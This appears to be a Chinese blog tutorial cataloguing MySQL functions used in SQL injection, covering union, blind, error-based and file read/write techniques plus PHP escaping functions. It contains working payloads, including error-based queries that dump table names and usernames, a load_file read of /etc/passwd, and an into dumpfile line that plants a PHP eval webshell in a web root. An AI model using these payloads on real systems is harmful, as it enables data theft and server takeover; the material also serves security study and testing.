- 1单例模式:二-懒汉模式(Lazy)
- 2搜索和数据库查询到底有什么区别
- 3关于”TCP直接返回“_tcp原路返回
- 4深入理解nginx的动态变量机制(完整版)
- 5Pandas四、Grouping(分组)和Sorting(排序)_pandas group sort
- 6vscode搭建openVINO(2020.03)开发环境(Makefile),Ubuntu18.04(下)_ubuntu 20.04 vscode 配置 openvino 2022.3 环境
- 7如何使用Sora?Sora小白教程一文通_sora 如何使用
- 8JAVA毕业设计固定资产管理系统计算机源码+lw文档+系统+调试部署+数据库_基于java+jdbc+sqlserver的固定资产管理系统设计与实现
- 9基于Python的大数据分析实战篇(一)_python大数据处理与分析
- 10Centos7.2 安装zabbix3.X_see "systemctl status sshd.service" and "journalct
sql注入常见函数(附图详解)_sql注入经常使用什么函数
赞
踩
0x01 mysql数据库基本函数
#MySQL数据库版本 version() #数据库用户名 user() #当前数据库名 database() #数据库安装路径 @@basedir #数据库文件存放路径 @@datadir #操作系统版本 @@version_compile_os
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
0x02 union联合注入函数
函数concat()
语法:concat(str1,str2,…)
拼接字符串,直接拼接,字符之间没有符号
函数concat_ws()
语法:concat_ws(‘separator’, str1, str2, …)
指定符号进行拼接
函数group_concat()
group_concat(username)
将username中的内容以逗号隔开显示出来
0x03 sql盲注函数
1. 布尔盲注函数
函数length()
返回指定对象的长度
length(database())返回当前数据库名的长度
函数left()与函数right()
left(str,num):对字符串str从左开始数起,返回num个字符(与函数right()相反)
函数substr()
substr()和substring()函数实现的功能是一样的,均为截取字符串。
substr(database(),1,1),查看数据库名第一位,substr(database(),2,1)查看数据库名第二位,依次查看各位字符。
substr(database(),1,3)
当前数据库名为security,从第1位开始,截取3位
substr(database(),4,1)
当前数据库名,从第4位开始,截取1位
函数mid()
与substr()函数用法相同
函数ascii()
返回字符串str的最左字符的数值,ASCII()返回数值是从0到255
函数ord()
与函数ascii()相同,返回字符串第一个字符的 ASCII 值。
2. 时间盲注函数
函数sleep()
sleep(5) 过5s响应
- 1
函数if()
if(1=1,3,4) 返回3
if(1=2,3,4) 返回4
- 1
- 2
0x04 报错注入函数
函数floor()
函数floor(),向下取整
floor(3.8) = 3
函数rand(),取随机数,若有参数x,则每个x对应一个固定的值
rand(0) = (0,1)内的任意一个数
函数exp()
函数exp()是以e为底的指数函数
~0表示对0进行按位取反
将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。
通过子查询与按位取反,造成一个DOUBLE overflow error,并借由此注出数据。
1" union select 1,2,exp(~(select * from (select database())a))--+
- 1
1" union select 1,2,exp(~(select * from (select group_concat(table_name) from information_schema.tables where table_schema=database())a))--+
- 1
函数updatexml()
updatexml(XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
select updatexml(1,concat(0x7E,(select database()),0x7E),1);
- 1
函数extractvalue()
extractvalue(XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
在数据库中报错
select extractvalue(1,concat(0x7E,(select database()),0x7E));
select extractvalue(1,concat(0x7E,(select group_concat(username) from users),0x7E));
- 1
- 2
0x05 读写文件函数
- 函数load_file()
作用:load_file这个函数是读取文件的
#读取文件/etc/passwd (还可以查看其他文件,需要相应的权限)
#路径可以为这两种格式"\\"与"/",
union select 1,2,load_file('/etc/passwd')
- 1
- 2
- 3
- 函数into outfile
作用:函数into outfile 与 into dumpfile都是写文件
#在/var/www/html新建文件a.php,在将一句话木马写入
union select 1,2,"<?php @eval($_POST[cmd]);?>" into dumpfile '/var/www/html/a.php'
- 1
- 2
0x06 其他相关的PHP函数
函数addslashes()
作用:函数返回在预定义字符之前添加反斜杠的字符串
预定义字符是:
单引号(’)
双引号(")
反斜杠(\)
NULL
函数stripslashes()
作用:stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
函数get_magic_quotes_gpc()
作用:函数get_magic_quotes_gpc()用于获取当前 magic_quotes_gpc 的配置选项设置
对于magic_quotes_gpc=on的情况, 我们可以不对输入和输出数据库的字符串数据作 addslashes()和stripslashes()的操作,数据也会正常显示。 如果此时你对输入的数据作了addslashes()处理, 那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。
对于magic_quotes_gpc=off 的情况 必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行
函数mysql_real_escape_string()
作用: 转义 SQL 语句中使用的字符串中的特殊字符
下列字符受影响:
\x00
\n
\r
’
"
\x1a
